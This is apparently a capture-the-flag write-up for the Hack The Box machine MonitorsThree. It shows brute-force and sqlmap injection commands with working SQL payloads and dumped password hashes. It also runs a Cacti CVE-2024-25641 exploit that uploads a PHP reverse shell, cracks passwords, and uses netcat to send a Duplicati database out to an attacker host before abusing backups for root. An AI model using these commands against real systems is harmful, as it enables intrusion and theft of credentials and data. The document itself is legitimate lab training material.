Recon
nmap -A -p- 10.129.186.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-25 12:37 UTC
Nmap scan report for 10.129.186.132
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)
|_ 256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
8084/tcp filtered websnp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└──╼ $gobuster vhost -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt -u http://monitorsthree.htb --append-domain -t 150
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://monitorsthree.htb
[+] Method: GET
[+] Threads: 150
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: cacti.monitorsthree.htb Status: 302 [Size: 0] [--> /cacti]
Main page:
monitorsthree login page:
We can try resseting passwords and it reveals to us usernames that are on the server.
Admin is there:
and test is not there:
the subdomain gets us Cacti version 1.2.26.
Time to start looking for some CVE’s for this “cacti”.
https://thehackernews.com/2024/05/critical-flaws-in-cacti-framework-could.html
Lookining at exploit-db, NIST and metasploit, everything seems to be out of date or work with valid logins.
Let’s try to brute force the password then, as we know the login.
hydra -l admin -P /usr/share/wordlists/rockyou.txt monitorsthree.htb http-post-form "/login.php:username=admin&password=^PASS^:F=302" -v -f -IWhile waiting for it to finish, I run also sqlmap:
sqlmap -r request.txt --batch --level=5 --risk=3Also running sqlmap against password reset site:
sqlmap -r request.txt -p username --dump-all --dbms=MySQL --level=5 --risk=3
...
sqlmap -r request.txt -p username --dump --dbms=MySQL --level=5 --risk=3
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:38:22 /2024-08-28/
[20:38:22] [INFO] parsing HTTP request from 'request.txt'
[20:38:22] [WARNING] provided value for parameter 'username' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[20:38:22] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] n
...
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 691 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=' OR NOT 8192=8192-- CVrj
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=' OR (SELECT 9009 FROM(SELECT COUNT(*),CONCAT(0x7162707a71,(SELECT (ELT(9009=9009,1))),0x716a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CRdp
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: username=';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=' AND (SELECT 7447 FROM (SELECT(SLEEP(5)))ECXW)-- QaOT
---
...
Database: monitorsthree_db
Table: users
[4 entries]
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| id | dob | email | name | salary | password | username | position | start_date |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| 2 | 1978-04-25 | admin@monitorsthree.htb | Marcus Higgins | 320800.00 | 31a181c8372e3afc59dab863430610e8 | admin | Super User | 2021-01-12 |
| 5 | 1985-02-15 | mwatson@monitorsthree.htb | Michael Watson | 75000.00 | c585d01f2eb3e6e1073e92023088a3dd | mwatson | Website Administrator | 2021-05-10 |
| 6 | 1990-07-30 | janderson@monitorsthree.htb | Jennifer Anderson | 68000.00 | 1e68b6eb86b45f6d92f8f292428f77ac | janderson | Network Engineer | 2021-06-20 |
| 7 | 1982-11-23 | dthompson@monitorsthree.htb | David Thompson | 83000.00 | 633b683cc128fe244b00f176c8a950f5 | dthompson | Database Manager | 2022-09-15 |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
Using crackstation we get: 31a181c8372e3afc59dab863430610e8 md5 greencacti2001
We are in.
Checking these creds also for cacti and we are in once again.
We can now get the shell with the CVE.
CVE-2024-25641
Googling gets us:
https://github.com/5ma1l/CVE-2024-25641
┌─[✗]─[user@parrot]─[~/Desktop/CVE-2024-25641]
└──╼ $./exploit.py http://cacti.monitorsthree.htb/cacti/ admin greencacti2001 -p ~/4victim/php-reverse-shell.php
Created by: 5ma1l
Automate the process of exploiting the CVE-2024-25641
[*] Login attempts...
[SUCCESS]
[*] Creating the gzip...
[SUCCESS]
GZIP path is /home/user/Desktop/CVE-2024-25641/rvbwcsivuoeqgipz.php.gz
[*] Sending payload...
[SUCCESS]
You will find the payload in http://cacti.monitorsthree.htb/cacti//resource/rvbwcsivuoeqgipz.php
Do you wanna start the payload ?[Y/n]Y
Payload is running...We are in. Standard shell stabilisation:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fgUser
Looking for config files in /www/html, our usual culprit:
find . -name *config*
Gets us:
#$rdatabase_type = 'mysql';
#$rdatabase_default = 'cacti';
#$rdatabase_hostname = 'localhost';
#$rdatabase_username = 'cactiuser';
#$rdatabase_password = 'cactiuser';
#$rdatabase_port = '3306';
#$rdatabase_retries = 5;
#$rdatabase_ssl = false;Lets explore the database mysql -u cactiuser -p -h localhost -P 3306 cacti.
select * from user_auth
1 | admin | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G | 0 | Administrator | marcus@monitorsthree.htb |
3 | guest | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu | 0 | Guest Account | guest@monitorsthree.htb |
4 | marcus | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK | 0 | Marcus | marcus@monitorsthree.htb | Lets get cracking with john:
$john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678910 (?) su marcus gets us the flag.
Priv esc
Checking all of the ports with ss -tuln gives:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8200 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:33029 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8084 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*
udp 0 0 0.0.0.0:68 0.0.0.0:* Lets check what is on this port:
socat TCP-LISTEN:8080,fork TCP:localhost:8200
Checking if there is anything on the server about “Duplicati”. /opt/duplicati/config has a bunch of interesting files including Duplicati-server.sqlite. Let’s send it back to us using netcat:
# on victim
nc 10.10.14.134 2222 < Duplicati-server.sqlite
# on host
nc -l -p 2222 > received_fileIn the option table we can find server passphrase and its salt.
pass: Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
salt: xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
Checking the logging screen with burp gets us the same salt.
To get it decrypted, we can need to learn what it is first.
https://hashes.com/en/tools/hash_identifier
We can reverse this process using cyberchef:
pass: 59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a
salt: c537f29165757404e9159bcf84294424b273600e40e0bef8857ec52bc5e66342
Couldnt decrypt it with john in reasonable amount of time, so decided to learn more about duplicati.
cyberchef conversion of passwd
Encode it with ctrl+u and send.
We are in.
I was stumbling here for a while, trying to create a backup with root folder. Only later did I discover, that the main folder shown for backups is the docker system and our system is under source folder.
Tried creating backup there then:
We get can now copy it to our machine, unzip and get the flag.
Looking at the root we can also find password for duplicati MonitorsThreeDuplicatiBackupPassword2024.
Now time to get real root.
Lets backup our ssh keys first:
Then restore them to root:
We can now connect via ssh to root.
